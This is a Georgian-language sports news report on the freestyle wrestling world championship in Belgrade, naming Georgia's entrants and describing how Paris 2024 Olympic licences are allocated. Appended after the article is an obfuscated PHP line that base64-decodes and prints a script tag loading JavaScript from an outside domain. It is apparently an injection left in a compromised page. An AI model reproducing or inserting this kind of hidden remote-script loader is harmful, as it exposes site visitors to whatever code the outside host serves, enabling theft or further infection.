celsiusi
ავერსი საქკაბელი

სერბეთის ქალაქ ბელგრადში დღეს სტარტს აიღებს მსოფლიოს ჩემპიონატი თავისუფალი სტილით ჭიდაობაში. ტურნირის პირველ საშეჯიბრო დღეს ოთხ წონით კატეგორიაში გამოვლინდებიან ფინალისტები.

61, 70, 86 და 125 კილოგრამებში საკვალიფიკაციო ეტაპების შეხვედრები თბილისის დროით 12:30 საათზე დაიწყება, ნახევარფინალები კი 18:45-ზე.

საქართველოს სახელით მსოფლიოს პირველობაზე მაღალი სინჯის მედლებისთვის შოთა ფარტენაძე (61 კგ), გიორგი ელბაქიძე (70 კგ), ტარიელ გაფრინდაშვილი (86 კგ) და გენო პეტრიაშვილი (125 კგ) იბრძოლებენ.

მსოფლიოს ჩემპიონატზე, მედლების გარდა, პარიზის 2024 წლის ოლიმპიური თამაშების ლიცენზიებიც გათამაშდება. ექვს ოლიმპიურ წონით კატეგორიაში – 57, 65, 74, 86, 97 და 125 კგ-ში პარიზის ოლიმპიადის საგზურს ხუთ-ხუთ უძლიერესი მოჭიდავე მოიპოვებს. ტურნირზე მედლების გათამაშების შემდეგ ოთხივე მედალოსანი სალიცენზიო ნორმატივს შეასრულებს, რეპეშაჟის ფინალში წაგებული ორი სპორტსმენი კი ერთმანეთს დაუპირისპირდება და მათ შორის წარმატებული მეხუთე ოლიმპიადის ლიცენზიის მფლობელი გახდება.

872
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");